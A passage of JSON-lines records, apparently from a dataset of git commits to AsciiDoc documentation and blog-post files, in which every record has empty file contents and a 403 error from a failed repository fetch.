deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/05\/27\/deref.adoc","new_file":"content\/news\/2022\/05\/27\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2b37fe627e46a3fa9426b47462784407bd8dc62e","subject":"Update 2017-02-01-A-Anatomia-de-um-Game.adoc","message":"Update 2017-02-01-A-Anatomia-de-um-Game.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-02-01-A-Anatomia-de-um-Game.adoc","new_file":"_posts\/2017-02-01-A-Anatomia-de-um-Game.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53eef5bec3a1a7eb813689c5dd3c2098b9964d8d","subject":"Update 2015-06-10-First-Try.adoc","message":"Update 2015-06-10-First-Try.adoc","repos":"leomedia\/blog,leomedia\/blog,leomedia\/blog","old_file":"_posts\/2015-06-10-First-Try.adoc","new_file":"_posts\/2015-06-10-First-Try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leomedia\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"196c0638cde9c989d89dde46494e8627eae26ce7","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b496e71adb2ae3c7b106e23354c369a1486326ed","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a80a5d162e95ade946c36b49cee32063e866c948","subject":"y2b create post Phone with 15 Year Battery Life?! Spare One Emergency Cell Phone - CES 2013","message":"y2b create post Phone with 15 Year Battery Life?! 
Spare One Emergency Cell Phone - CES 2013","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-07-Phone-with-15-Year-Battery-Life-Spare-One-Emergency-Cell-Phone--CES-2013.adoc","new_file":"_posts\/2013-01-07-Phone-with-15-Year-Battery-Life-Spare-One-Emergency-Cell-Phone--CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12e61bfdeae7c9388cb229db9421ec67e99e749a","subject":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-19-OnePlus%205T%20Lava%20Red%20Unboxing%20-%20%24500%20Can't%20Go%20Further.adoc","new_file":"_posts\/2018-01-19-OnePlus%205T%20Lava%20Red%20Unboxing%20-%20%24500%20Can't%20Go%20Further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e823526a856dd7326a37ecef59405aa3283857ec","subject":"Update 2016-11-11-232000-Friday.adoc","message":"Update 2016-11-11-232000-Friday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-11-232000-Friday.adoc","new_file":"_posts\/2016-11-11-232000-Friday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e01cc5a162803b584530d9676e3c16bc44365d7","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"631888b99301714a44f3b7b99a836ec5a0f9dcdb","subject":"Update 2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","message":"Update 
2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","new_file":"_posts\/2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"843866c654af4dcc405b7ab9d8b30ae0a7fc1144","subject":"Add placeholder flow diagram chapter","message":"Add placeholder flow diagram chapter\n","repos":"bsmr-erlang\/cowboy,CrankWheel\/cowboy,ninenines\/cowboy,turtleDeng\/cowboy,hairyhum\/cowboy,kivra\/cowboy,rabbitmq\/cowboy,K2InformaticsGmbH\/cowboy","old_file":"doc\/src\/guide\/flow_diagram.asciidoc","new_file":"doc\/src\/guide\/flow_diagram.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rabbitmq\/cowboy.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"dce74827394e3cf0a195480fc875aac1f3ab2cd7","subject":"Create readme.adoc","message":"Create readme.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"kafka\/kafka-wildfly\/readme.adoc","new_file":"kafka\/kafka-wildfly\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cafb23d2832a2ac2872d8de604981a386ffdf1e3","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e4c4c3983efe84991ad5140b8e1907b9ee02056","subject":"Update 2015-10-23-HSBC-Premier.adoc","message":"Update 2015-10-23-HSBC-Premier.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-10-23-HSBC-Premier.adoc","new_file":"_posts\/2015-10-23-HSBC-Premier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4edf9bb430ae7215c71a5844ec846e1128841536","subject":"Add info how to remove a node","message":"Add info how to remove a node\n","repos":"BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,BBVA\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"85a447b874bd4feebc0c14701a9ce39fc35bee41","subject":"Switch back to codecov.io in README.adoc","message":"Switch back to codecov.io in README.adoc\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80d159b2ccd0d5177d14905f72de2b5fe60612ba","subject":"Add missing resource_registry section into sample env file","message":"Add missing resource_registry section into sample env file\n\nThe sample file in README didn't contain required resource_registry\nsection which caused that some router types were undefined.\n\nFixes: #172\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,BBVA\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cf6af0ac4e5f3caca24f82119fb6f1f6fe0178c","subject":"added README for saslauthd-port","message":"added README for saslauthd-port\n\nChange-Id: Ibaf073149ec3d78f3265b4e23c236b420942c14a\nReviewed-on: http:\/\/review.couchbase.org\/44116\nReviewed-by: Artem Stemkovski <15a0730a27c69f62ab86f2b6c639fca202166c02@couchbase.com>\nTested-by: Aliaksey Kandratsenka <340b8e09ca65cd3fc686427fcfed17e87eaf61e2@gmail.com>\nReviewed-by: Aliaksey Artamonau <3c875bcfb3adf2a65b2ae7686ca921e6c9433147@gmail.com>\n","repos":"couchbase\/cbauth,couchbase\/cbauth","old_file":"cmd\/saslauthd-port\/README.asciidoc","new_file":"cmd\/saslauthd-port\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbase\/cbauth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1f1a3aac2cbd0b2ed5858a03ecfa5837fdaa67d","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a917288be95290189b41ff6aedbc4651840a47","subject":"docs: add missing `build` module","message":"docs: add missing `build` module\n\nThis was not added because the root `.gitignore` file contained `build\/`\n(fixed by 4dd70d0 (\".gitignore: simplify\")).\n\nSigned-off-by: Philippe Proulx 
<2096628897b40c93960fdd9e24c9c883a54d4fe9@gmail.com>\n","repos":"efficios\/barectf,efficios\/barectf","old_file":"docs\/modules\/build\/pages\/index.adoc","new_file":"docs\/modules\/build\/pages\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/efficios\/barectf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c399612d0d186269426f52fc2951448c254194d1","subject":"Update 2015-07-24-Very-basic-music-visualization-template.adoc","message":"Update 2015-07-24-Very-basic-music-visualization-template.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-24-Very-basic-music-visualization-template.adoc","new_file":"_posts\/2015-07-24-Very-basic-music-visualization-template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ed98a2c22da6c168c76f8ca52b5e342a766187a","subject":"Update 2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","message":"Update 2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","new_file":"_posts\/2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4009d5e64874ae443637c54be88123f48534adaa","subject":"add \/reads unlisted page to link to faves when trying to start bookclubs","message":"add \/reads unlisted page to link to faves when trying to start bookclubs\n","repos":"jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com","old_file":"content\/reads.adoc","new_file":"content\/reads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/jzacsh.github.com.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe4883aa7d7081d1581d65c40f54e2653beaebfc","subject":"Update 2016-01-05-Post-de-prueba.adoc","message":"Update 2016-01-05-Post-de-prueba.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2016-01-05-Post-de-prueba.adoc","new_file":"_posts\/2016-01-05-Post-de-prueba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ed9840e07d109e36c149332cdce3cd3b6a8631c","subject":"Update 2016-08-08-Patreon-Launch.adoc","message":"Update 2016-08-08-Patreon-Launch.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-08-Patreon-Launch.adoc","new_file":"_posts\/2016-08-08-Patreon-Launch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baa8867aec2860449bd807887f3539e50ec7aa5f","subject":"y2b create post Thank you.","message":"y2b create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-18-Thank%20you..adoc","new_file":"_posts\/2018-02-18-Thank%20you..adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"829e56d028f97584b77d56cf1ea76905b63861ba","subject":"Add some notes about clean code and merging.","message":"Add some notes about clean code and merging.\n","repos":"jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"624df6b97b2d41e098c39ebc78b2643f8ee59c08","subject":"GTNPORTAL-3026 Document quickstarts release process","message":"GTNPORTAL-3026 Document quickstarts release process","repos":"jboss-developer\/jboss-portal-quickstarts,jboss-developer\/jboss-portal-quickstarts,jboss-developer\/jboss-portal-quickstarts,jboss-developer\/jboss-portal-quickstarts","old_file":"howto-release.adoc","new_file":"howto-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-developer\/jboss-portal-quickstarts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9141dbc3dbb010a0dac70c208ad9f84687edce41","subject":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","message":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5c4ddac3374ec57b26084264b257c92189374cb3","subject":"Update 2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","message":"Update 2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","new_file":"_posts\/2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16845cd21bf111ff3e1317804e5fe99082ff402a","subject":"y2b create post DON'T Buy The Batband, Unless...","message":"y2b create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-03-DONT-Buy-The-Batband-Unless.adoc","new_file":"_posts\/2017-12-03-DONT-Buy-The-Batband-Unless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c59ad10cc0cc0582a00df3738ce5422cb73a0f3","subject":"recent concepts changes","message":"recent concepts changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a122f89712b3f202342b5d9831fc670cb8bb0da","subject":"Update 2016-11-09-231200-Wednesday-Remainder.adoc","message":"Update 2016-11-09-231200-Wednesday-Remainder.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-09-231200-Wednesday-Remainder.adoc","new_file":"_posts\/2016-11-09-231200-Wednesday-Remainder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ed3baff5cd9259332afe121b5cb09d55962d90","subject":"First batch of changes to the baseDoc file","message":"First batch of changes to the baseDoc 
file\n","repos":"hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,mwringe\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics","old_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b852fa18447b517edd2351001a4935a5ffa7cf9","subject":"Add documentation for min_hash filter (#39671)","message":"Add documentation for min_hash filter (#39671)\n\n* Add documentation for min_hash filter\r\n\r\nCloses #20757","repos":"GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/minhash-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/minhash-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf83e7a193b9b085d31180bb9a49a83b946836e3","subject":"Communication section.","message":"Communication section.\n","repos":"uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b47cf3473905bf8660aed4ad0ccd5a910e63e15e","subject":"Update 
2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","message":"Update 2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","new_file":"_posts\/2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3ac61f11d3e9f4fc69fa10c94913b40dce1fa50","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"spring-projects\/spring-social-twitter,hudsonmendes\/spring-social-twitter,hudsonmendes\/spring-social-twitter,spring-projects\/spring-social-twitter","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-social-twitter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e19495ecd254165cc173fae508060c307d61e56d","subject":"Create README.adoc","message":"Create README.adoc","repos":"ajneu\/recursive_template_inheritance_class","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/recursive_template_inheritance_class.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d26db543adeb2dfd8e98bce65e69fd40ecde81f8","subject":"wildfly instructions","message":"wildfly instructions\n","repos":"mdanter\/optaconf,ge0ffrey\/optaconf,ge0ffrey\/optaconf,oskopek\/optaconf,oskopek\/optaconf,oskopek\/optaconf,ge0ffrey\/optaconf,mdanter\/optaconf,mdanter\/optaconf","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdanter\/optaconf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0819b9728dabd732f65a32cd295e217fddf74e7","subject":"Add `ExtensionContext.Store.CloseableResource` to the release notes","message":"Add `ExtensionContext.Store.CloseableResource` to the release notes\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.1.0-M2.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.1.0-M2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sbrannen\/junit-lambda.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7effca226a6e75d883a5ff4cb837c536fad08b05","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 